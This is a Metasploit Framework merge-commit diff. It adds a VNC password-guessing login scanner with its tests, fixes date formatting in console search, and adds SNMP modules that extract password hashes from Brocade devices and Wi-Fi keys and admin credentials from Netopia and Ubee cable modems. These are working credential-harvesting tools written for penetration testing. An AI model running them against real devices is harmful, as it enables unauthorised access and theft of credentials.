Merge branch 'staging/electro-release' into feature/MSP-9640/cred_creation

2014-05-16 11:25:37 -05:00 · 2014-05-16 11:25:37 -05:00 · ce761e5569
parent 9471e597b6 b5807b990a
commit ce761e5569
10 changed files with 541 additions and 9 deletions
--- a/lib/metasploit/framework/login_scanner/vnc.rb
+++ b/lib/metasploit/framework/login_scanner/vnc.rb
@ -0,0 +1,115 @@
+require 'metasploit/framework/tcp/client'
+require 'rex/proto/rfb'
+require 'metasploit/framework/login_scanner/base'
+require 'metasploit/framework/login_scanner/rex_socket'
+
+module Metasploit
+  module Framework
+    module LoginScanner
+      # This is the LoginScanner class for dealing with the VNC RFB protocol.
+      # It is responsible for taking a single target, and a list of credentials
+      # and attempting them. It then saves the results.
+      class VNC
+        include Metasploit::Framework::LoginScanner::Base
+        include Metasploit::Framework::LoginScanner::RexSocket
+        include Metasploit::Framework::Tcp::Client
+
+
+        #
+        # CONSTANTS
+        #
+
+        # Error indicating retry should occur for UltraVNC
+        ULTRA_VNC_RETRY_ERROR = 'connection has been rejected'
+        # Error indicating retry should occur for VNC 4 Server
+        VNC4_SERVER_RETRY_ERROR = 'Too many security failures'
+        # Known retry errors for all supported versions of VNC
+        RETRY_ERRORS = [
+            ULTRA_VNC_RETRY_ERROR,
+            VNC4_SERVER_RETRY_ERROR
+        ]
+
+        # This method attempts a single login with a single credential against the target
+        # @param credential [Credential] The credential object to attmpt to login with
+        # @return [Metasploit::Framework::LoginScanner::Result] The LoginScanner Result object
+        def attempt_login(credential)
+          result_options = {
+              credential: credential
+          }
+
+          begin
+            # Make our initial socket to the target
+            disconnect if self.sock
+            connect
+
+            # Create our VNC client overtop of the socket
+            vnc = Rex::Proto::RFB::Client.new(sock, :allow_none => false)
+
+
+            if vnc.handshake
+              if vnc_auth(vnc,credential.private)
+                result_options[:status] = :success
+              else
+                result_options.merge!(
+                  proof: vnc.error,
+                  status: :failed
+                )
+              end
+            else
+              result_options.merge!(
+                proof: vnc.error,
+                status: :connection_error
+              )
+            end
+          rescue ::EOFError,  Rex::AddressInUse, Rex::ConnectionError, Rex::ConnectionTimeout, ::Timeout::Error => e
+            result_options.merge!(
+                proof: e.message,
+                status: :connection_error
+            )
+          end
+
+          ::Metasploit::Framework::LoginScanner::Result.new(result_options)
+        end
+
+        private
+
+        # Check the VNC error to see if we should wait and retry.
+        #
+        # @param error [String] The VNC error message received
+        # @return [false] don't retry
+        # @return [true] retry
+        def retry?(error)
+          RETRY_ERRORS.include?(error)
+        end
+
+        # This method sets the sane defaults for things
+        # like timeouts and TCP evasion options
+        def set_sane_defaults
+          self.max_send_size ||= 0
+          self.send_delay    ||= 0
+        end
+
+        # This method attempts the actual VNC authentication. It has built in retries to handle
+        # delays built into the VNC RFB authentication.
+        # @param client [Rex::Proto::RFB::Client] The VNC client object to authenticate through
+        # @param password [String] the password to attempt the authentication with
+        def vnc_auth(client,password)
+          success = false
+          5.times do |n|
+            if client.authenticate(password)
+              success = true
+              break
+            end
+            break unless retry?(client.error)
+
+            # Wait for an increasing ammount of time before retrying
+            delay = (2**(n+1)) + 1
+            ::Rex.sleep(delay)
+          end
+          success
+        end
+      end
+
+    end
+  end
+end
--- a/lib/msf/ui/console/command_dispatcher/core.rb
+++ b/lib/msf/ui/console/command_dispatcher/core.rb
@ -97,6 +97,9 @@ class Core
  # mode.
  DefangedProhibitedDataStoreElements = [ "MsfModulePaths" ]

+  # Constant for disclosure date formatting in search functions
+  DISCLOSURE_DATE_FORMAT = "%Y-%m-%d"
+
  # Returns the list of commands supported by this command dispatcher
  def commands
    {
@ -1477,7 +1480,7 @@ class Core
        next if not o

        if not o.search_filter(match)
-          tbl << [ o.fullname, o.disclosure_date.to_s, o.rank_to_s, o.name ]
+          tbl << [ o.fullname, o.disclosure_date.nil? ? "" : o.disclosure_date.strftime(DISCLOSURE_DATE_FORMAT), o.rank_to_s, o.name ]
        end
      end
    end
@ -1492,7 +1495,7 @@ class Core
  def search_modules_sql(search_string)
    tbl = generate_module_table("Matching Modules")
    framework.db.search_modules(search_string).each do |o|
-      tbl << [ o.fullname, o.disclosure_date.to_s, RankingName[o.rank].to_s, o.name ]
+      tbl << [ o.fullname, o.disclosure_date.nil? ? "" : o.disclosure_date.strftime(DISCLOSURE_DATE_FORMAT), RankingName[o.rank].to_s, o.name ]
    end
    print_line(tbl.to_s)
  end
@ -3270,7 +3273,7 @@ class Core
            end
          end
          if (opts == nil or show == true)
-            tbl << [ refname, o.disclosure_date||"", o.rank_to_s, o.name ]
+            tbl << [ refname, o.disclosure_date.nil? ? "" : o.disclosure_date.strftime(DISCLOSURE_DATE_FORMAT), o.rank_to_s, o.name ]
          end
        end
      end
--- a/modules/auxiliary/dos/hp/data_protector_rds.rb
+++ b/modules/auxiliary/dos/hp/data_protector_rds.rb
@ -6,7 +6,6 @@
 require 'msf/core'

 class Metasploit3 < Msf::Auxiliary
-  Rank = ManualRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Dos
--- a/modules/auxiliary/dos/tcp/junos_tcp_opt.rb
+++ b/modules/auxiliary/dos/tcp/junos_tcp_opt.rb
@ -10,9 +10,6 @@ class Metasploit3 < Msf::Auxiliary
  include Msf::Exploit::Capture
  include Msf::Auxiliary::Dos

-  # The whole point is to cause a router crash.
-  Rank = ManualRanking
-
  def initialize
    super(
      'Name'        => 'Juniper JunOS Malformed TCP Option',
--- a/modules/auxiliary/dos/windows/smb/ms11_019_electbowser.rb
+++ b/modules/auxiliary/dos/windows/smb/ms11_019_electbowser.rb
@ -4,7 +4,6 @@
 ##

 class Metasploit3 < Msf::Auxiliary
-  Rank = ManualRanking

  include Msf::Exploit::Remote::Udp
  #include Msf::Exploit::Remote::SMB
--- a/modules/auxiliary/scanner/snmp/brocade_enumhash.rb
+++ b/modules/auxiliary/scanner/snmp/brocade_enumhash.rb
@ -0,0 +1,74 @@
+#
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::SNMPClient
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::Scanner
+
+  def initialize
+    super(
+      'Name'        => 'Brocade Password Hash Enumeration',
+      'Description' => %q{
+        This module extracts password hashes from certain Brocade load
+        balancer devices.
+      },
+      'References'  =>
+        [
+          [ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2014/05/15/r7-2014-01-r7-2014-02-r7-2014-03-disclosures-exposure-of-critical-information-via-snmp-public-community-string' ]
+        ],
+      'Author'      => ['Deral "PercentX" Heiland'],
+      'License'     => MSF_LICENSE
+    )
+
+  end
+
+  def run_host(ip)
+    begin
+      snmp = connect_snmp
+
+      if snmp.get_value('sysDescr.0') =~ /Brocade/
+
+        @users = []
+        snmp.walk("1.3.6.1.4.1.1991.1.1.2.9.2.1.1") do |row|
+          row.each { |val| @users << val.value.to_s }
+        end
+
+        @hashes = []
+        snmp.walk("1.3.6.1.4.1.1991.1.1.2.9.2.1.2") do |row|
+          row.each { |val| @hashes << val.value.to_s }
+        end
+
+        print_good("#{ip} Found Users & Password Hashes:")
+        end
+
+        credinfo = ""
+        @users.each_index do |i|
+        credinfo << "#{@users[i]}:#{@hashes[i]}" << "\n"
+        print_good("#{@users[i]}:#{@hashes[i]}")
+        end
+
+
+     #Woot we got loot.
+     loot_name     = "brocade.hashes"
+     loot_type     = "text/plain"
+     loot_filename = "brocade_hashes.txt"
+     loot_desc     = "Brodace username and password hashes"
+     p = store_loot(loot_name, loot_type, datastore['RHOST'], credinfo , loot_filename, loot_desc)
+
+     print_status("Credentials saved: #{p}")
+     rescue ::SNMP::UnsupportedVersion
+     rescue ::SNMP::RequestTimeout
+     rescue ::Interrupt
+       raise $!
+     rescue ::Exception => e
+       print_error("#{ip} error: #{e.class} #{e}")
+     disconnect_snmp
+     end
+  end
+end
--- a/modules/auxiliary/scanner/snmp/netopia_enum.rb
+++ b/modules/auxiliary/scanner/snmp/netopia_enum.rb
@ -0,0 +1,102 @@
+#
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::SNMPClient
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::Scanner
+
+  def initialize
+    super(
+      'Name'        => 'Netopia 3347 Cable Modem Wifi Enumeration',
+      'Description' => %q{
+        This module extracts WEP keys and WPA preshared keys from
+        certain Netopia cable modems.
+      },
+      'References'  =>
+        [
+          [ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2014/05/15/r7-2014-01-r7-2014-02-r7-2014-03-disclosures-exposure-of-critical-information-via-snmp-public-community-string' ]
+        ],
+      'Author'      => ['Deral "PercentX" Heiland'],
+      'License'     => MSF_LICENSE
+    )
+
+  end
+
+  def run_host(ip)
+      output_data = {}
+    begin
+      snmp = connect_snmp
+
+      if snmp.get_value('sysDescr.0') =~ /Netopia 3347/
+
+      wifistatus = snmp.get_value('1.3.6.1.4.1.304.1.3.1.26.1.1.0')
+        if wifistatus == "1"
+        wifiinfo = ""
+        ssid = snmp.get_value('1.3.6.1.4.1.304.1.3.1.26.1.9.1.2.1')
+        print_good("#{ip}")
+        print_good("SSID: #{ssid}")
+        wifiinfo << "SSID: #{ssid}" << "\n"
+
+          wifiversion = snmp.get_value('1.3.6.1.4.1.304.1.3.1.26.1.9.1.4.1')
+            if wifiversion == "1"
+
+            #Wep enabled
+            elsif wifiversion == ("2"||"3")
+              wepkey1 = snmp.get_value('1.3.6.1.4.1.304.1.3.1.26.1.15.1.3.1')
+              print_good("WEP KEY1: #{wepkey1}")
+              wifiinfo << "WEP KEY1: #{wepkey1}" << "\n"
+              wepkey2 = snmp.get_value('1.3.6.1.4.1.304.1.3.1.26.1.15.1.3.2')
+              print_good("WEP KEY2: #{wepkey2}")
+              wifiinfo << "WEP KEY2: #{wepkey2}" << "\n"
+              wepkey3 = snmp.get_value('1.3.6.1.4.1.304.1.3.1.26.1.15.1.3.3')
+              print_good("WEP KEY3: #{wepkey3}")
+              wifiinfo << "WEP KEY3: #{wepkey3}" << "\n"
+              wepkey4 = snmp.get_value('1.3.6.1.4.1.304.1.3.1.26.1.15.1.3.4')
+              print_good("WEP KEY4: #{wepkey4}")
+              wifiinfo << "WEP KEY4: #{wepkey4}" << "\n"
+              actkey = snmp.get_value('1.3.6.1.4.1.304.1.3.1.26.1.13.0')
+              print_good("Active Wep key is Key#{actkey}")
+              wifiinfo << "Active WEP key is KEY#: #{actkey}" << "\n"
+
+            #WPA enabled
+            elsif wifiversion == "4"
+              print_line("Device is configured for WPA ")
+              wpapsk = snmp.get_value('1.3.6.1.4.1.304.1.3.1.26.1.9.1.5.1')
+              print_good("WPA PSK: #{wpapsk}")
+              wifiinfo << "WPA PSK: #{wpapsk}" << "\n"
+
+            #WPA Enterprise enabled
+            elsif wifiversion == "5"
+              print_line("Device is configured for WPA enterprise")
+              else
+              print_line("FAILED")
+            end
+
+      else
+         print_line("WIFI is not enabled")
+      end
+    end
+     #Woot we got loot.
+     loot_name     = "netopia_wifi"
+     loot_type     = "text/plain"
+     loot_filename = "netopia_wifi.txt"
+     loot_desc     = "Netopia Wifi configuration data"
+     p = store_loot(loot_name, loot_type, datastore['RHOST'], wifiinfo , loot_filename, loot_desc)
+     print_status("WIFI Data saved: #{p}")
+
+     rescue ::SNMP::UnsupportedVersion
+     rescue ::SNMP::RequestTimeout
+     rescue ::Interrupt
+       raise $!
+     rescue ::Exception => e
+       print_error("#{ip} error: #{e.class} #{e}")
+     disconnect_snmp
+     end
+  end
+end
--- a/modules/auxiliary/scanner/snmp/ubee_ddw3611.rb
+++ b/modules/auxiliary/scanner/snmp/ubee_ddw3611.rb
@ -0,0 +1,159 @@
+#
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::SNMPClient
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::Scanner
+
+  def initialize
+    super(
+      'Name'        => 'Ubee DDW3611b Cable Modem Wifi Enumeration',
+      'Description' => %q{
+        This module will extract WEP keys and WPA preshared keys from
+        certain Ubee cable modems.
+      },
+      'References'  =>
+        [
+          [ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2014/05/15/r7-2014-01-r7-2014-02-r7-2014-03-disclosures-exposure-of-critical-information-via-snmp-public-community-string' ]
+        ],
+      'Author'      => ['Deral "PercentX" Heiland'],
+      'License'     => MSF_LICENSE
+    )
+
+  end
+
+  def run_host(ip)
+      output_data = {}
+    begin
+      snmp = connect_snmp
+
+      if snmp.get_value('1.2.840.10036.2.1.1.9.12') =~ /DDW3611/
+        print_good("#{ip}")
+        wifiinfo = ""
+
+        # System user account and Password
+        username = snmp.get_value('1.3.6.1.4.1.4491.2.4.1.1.6.1.1.0')
+        print_good("Username: #{username}")
+        wifiinfo << "Username: #{username}" << "\n"
+        password = snmp.get_value('1.3.6.1.4.1.4491.2.4.1.1.6.1.2.0')
+        print_good("Password: #{password}")
+        wifiinfo << "Password: #{password}" << "\n"
+
+        wifistatus = snmp.get_value('1.3.6.1.2.1.2.2.1.8.12')
+        if wifistatus == 1
+          ssid = snmp.get_value('1.3.6.1.4.1.4684.38.2.2.2.1.5.4.1.14.1.3.12')
+          print_good("SSID: #{ssid}")
+          wifiinfo << "SSID: #{ssid}" << "\n"
+
+          #Wifi Security Version
+          wifiversion = snmp.get_value('1.3.6.1.4.1.4684.38.2.2.2.1.5.4.1.14.1.5.12')
+          if wifiversion == "0"
+            print_line("Open Access Wifi is Enabled")
+
+          #Wep enabled
+          elsif wifiversion == "1"
+          weptype = snmp.get_value('1.3.6.1.4.1.4684.38.2.2.2.1.5.4.2.1.1.2.12')
+            if weptype == "2"
+              wepkey1 = snmp.get_value('1.3.6.1.4.1.4684.38.2.2.2.1.5.4.2.3.1.2.12.1')
+              key1 = "#{wepkey1}".unpack('H*')
+              print_good("WEP KEY1: #{key1}")
+              wifiinfo << "WEP KEY1: #{key1}" << "\n"
+              wepkey2 = snmp.get_value('1.3.6.1.4.1.4684.38.2.2.2.1.5.4.2.3.1.2.12.2')
+              key2 = "#{wepkey2}".unpack('H*')
+              print_good("WEP KEY2: #{key2}")
+              wifiinfo << "WEP KEY2: #{key2}" << "\n"
+              wepkey3 = snmp.get_value('1.3.6.1.4.1.4684.38.2.2.2.1.5.4.2.3.1.2.12.3')
+              key3 = "#{wepkey3}".unpack('H*')
+              print_good("WEP KEY3: #{key3}")
+              wifiinfo << "WEP KEY3: #{key3}" << "\n"
+              wepkey4 = snmp.get_value('1.3.6.1.4.1.4684.38.2.2.2.1.5.4.2.3.1.2.12.4')
+              key4 = "#{wepkey4}".unpack('H*')
+              print_good("WEP KEY4: #{key4}")
+              wifiinfo << "WEP KEY4: #{key4}" << "\n"
+              actkey = snmp.get_value('1.3.6.1.4.1.4684.38.2.2.2.1.5.4.2.1.1.1.12')
+              print_good("Active Wep key is #{actkey}")
+              wifiinfo << "Active WEP key is KEY#: #{actkey}" << "\n"
+
+            elsif weptype == "1"
+              wepkey1 = snmp.get_value('1.3.6.1.4.1.4684.38.2.2.2.1.5.4.2.2.1.2.12.1')
+              key1 = "#{wepkey1}".unpack('H*')
+              print_good("WEP KEY1: #{key1}")
+              wifiinfo << "WEP KEY1: #{key1}" << "\n"
+              wepkey2 = snmp.get_value('1.3.6.1.4.1.4684.38.2.2.2.1.5.4.2.2.1.2.12.2')
+              key2 = "#{wepkey2}".unpack('H*')
+              print_good("WEP KEY2: #{key2}")
+              wifiinfo << "WEP KEY2: #{key2}" << "\n"
+              wepkey3 = snmp.get_value('1.3.6.1.4.1.4684.38.2.2.2.1.5.4.2.2.1.2.12.3')
+              key3 = "#{wepkey3}".unpack('H*')
+              print_good("WEP KEY3: #{key3}")
+              wifiinfo << "WEP KEY3: #{key3}" << "\n"
+              wepkey4 = snmp.get_value('1.3.6.1.4.1.4684.38.2.2.2.1.5.4.2.2.1.2.12.4')
+              key4 = "#{wepkey4}".unpack('H*')
+              print_good("WEP KEY4: #{key4}")
+              wifiinfo << "WEP KEY4: #{key4}" << "\n"
+              actkey = snmp.get_value('1.3.6.1.4.1.4684.38.2.2.2.1.5.4.2.1.1.1.12')
+              print_good("Active Wep key is #{actkey}")
+              wifiinfo << "Active WEP key is KEY#: #{actkey}" << "\n"
+
+            else
+              print_line("FAILED")
+            end
+
+          #WPA enabled
+          elsif wifiversion == "2"
+            print_line("Device is configured for WPA ")
+            wpapsk = snmp.get_value('1.3.6.1.4.1.4491.2.4.1.1.6.2.2.1.5.12')
+            print_good("WPA PSK: #{wpapsk}")
+            wifiinfo << "WPA PSK: #{wpapsk}" << "\n"
+
+          #WPA2 enabled
+          elsif wifiversion == "3"
+            print_line("Device is configured for WPA2")
+            wpapsk2 = snmp.get_value('1.3.6.1.4.1.4491.2.4.1.1.6.2.2.1.5.12')
+            print_good("WPA2 PSK: #{wpapsk2}")
+            wifiinfo << "WPA PSK: #{wpapsk2}" << "\n"
+
+          #WPA Enterprise enabled
+          elsif wifiversion == "4"
+            print_line("Device is configured for WPA enterprise")
+
+          #WPA2 Enterprise enabled
+          elsif wifiversion == "5"
+            print_line("Device is configured for WPA2 enterprise")
+
+          #WEP 802.1x enabled
+          elsif wifiversion == "6"
+            print_line("Device is configured for WEP 802.1X")
+
+          else
+            print_line("FAILED")
+          end
+
+        else
+         print_line("WIFI is not enabled")
+         end
+    end
+     #Woot we got loot.
+     loot_name     = "ubee_wifi"
+     loot_type     = "text/plain"
+     loot_filename = "ubee_wifi.txt"
+     loot_desc     = "Ubee Wifi configuration data"
+     p = store_loot(loot_name, loot_type, datastore['RHOST'], wifiinfo , loot_filename, loot_desc)
+     print_status("WIFI Data saved: #{p}")
+
+     rescue ::SNMP::UnsupportedVersion
+     rescue ::SNMP::RequestTimeout
+     rescue ::Interrupt
+       raise $!
+     rescue ::Exception => e
+       print_error("#{ip} error: #{e.class} #{e}")
+     disconnect_snmp
+     end
+  end
+end
--- a/spec/lib/metasploit/framework/login_scanner/vnc_spec.rb
+++ b/spec/lib/metasploit/framework/login_scanner/vnc_spec.rb
@ -0,0 +1,84 @@
+require 'spec_helper'
+require 'metasploit/framework/login_scanner/vnc'
+
+describe Metasploit::Framework::LoginScanner::VNC do
+  let(:private) { 'password' }
+  let(:blank) { '' }
+  let(:test_cred) {
+    Metasploit::Framework::LoginScanner::Credential.new( paired: false, private: private )
+  }
+  let(:blank_cred) {
+    Metasploit::Framework::LoginScanner::Credential.new( paired: false, private: blank )
+  }
+  subject(:login_scanner) { described_class.new }
+
+  it_behaves_like 'Metasploit::Framework::LoginScanner::Base'
+  it_behaves_like 'Metasploit::Framework::LoginScanner::RexSocket'
+
+
+  context '#attempt_login' do
+    it 'creates a new RFB client' do
+      Rex::Proto::RFB::Client.should_receive(:new).and_call_original
+      login_scanner.attempt_login(test_cred)
+    end
+
+    it 'returns a connection_error result when the handshake fails' do
+      Rex::Proto::RFB::Client.any_instance.should_receive(:handshake).and_return false
+      result = login_scanner.attempt_login(test_cred)
+      expect(result.status).to eq :connection_error
+    end
+
+    it 'returns a failed result when authentication fails' do
+      Rex::Proto::RFB::Client.any_instance.should_receive(:handshake).and_return true
+      Rex::Proto::RFB::Client.any_instance.should_receive(:authenticate).with(private).and_return false
+      result = login_scanner.attempt_login(test_cred)
+      expect(result.status).to eq :failed
+    end
+
+    context 'when the socket errors' do
+      it 'returns a connection_error result for an EOFError' do
+        my_scanner = login_scanner
+        my_scanner.should_receive(:connect).and_raise ::EOFError
+        result = my_scanner.attempt_login(test_cred)
+        expect(result.status).to eq :connection_error
+        expect(result.proof).to eq ::EOFError.new.to_s
+      end
+
+      it 'returns a connection_error result for an Rex::AddressInUse' do
+        my_scanner = login_scanner
+        my_scanner.should_receive(:connect).and_raise ::Rex::AddressInUse
+        result = my_scanner.attempt_login(test_cred)
+        expect(result.status).to eq :connection_error
+        expect(result.proof).to eq ::Rex::AddressInUse.new.to_s
+      end
+
+      it 'returns a connection_error result for an Rex::ConnectionError' do
+        my_scanner = login_scanner
+        my_scanner.should_receive(:connect).and_raise ::Rex::ConnectionError
+        result = my_scanner.attempt_login(test_cred)
+        expect(result.status).to eq :connection_error
+        expect(result.proof).to eq ::Rex::ConnectionError.new.to_s
+      end
+
+      it 'returns a connection_error result for an Rex::ConnectionTimeout' do
+        my_scanner = login_scanner
+        my_scanner.should_receive(:connect).and_raise ::Rex::ConnectionTimeout
+        result = my_scanner.attempt_login(test_cred)
+        expect(result.status).to eq :connection_error
+        expect(result.proof).to eq ::Rex::ConnectionTimeout.new.to_s
+      end
+
+      it 'returns a connection_error result for an ::Timeout::Error' do
+        my_scanner = login_scanner
+        my_scanner.should_receive(:connect).and_raise ::Timeout::Error
+        result = my_scanner.attempt_login(test_cred)
+        expect(result.status).to eq :connection_error
+        expect(result.proof).to eq ::Timeout::Error.new.to_s
+      end
+    end
+
+
+
+  end
+
+end
--- a/spec/lib/msf/ui/command_dispatcher/core_spec.rb
+++ b/spec/lib/msf/ui/command_dispatcher/core_spec.rb
@ -82,7 +82,7 @@ describe Msf::Ui::Console::CommandDispatcher::Core do
        end

        it 'should have disclosure date in second column' do
-          cell(printed_table, 0, 1).should include(module_detail.disclosure_date.to_s)
+          cell(printed_table, 0, 1).should include(module_detail.disclosure_date.strftime("%Y-%m-%d"))
        end

        it 'should have rank name in third column' do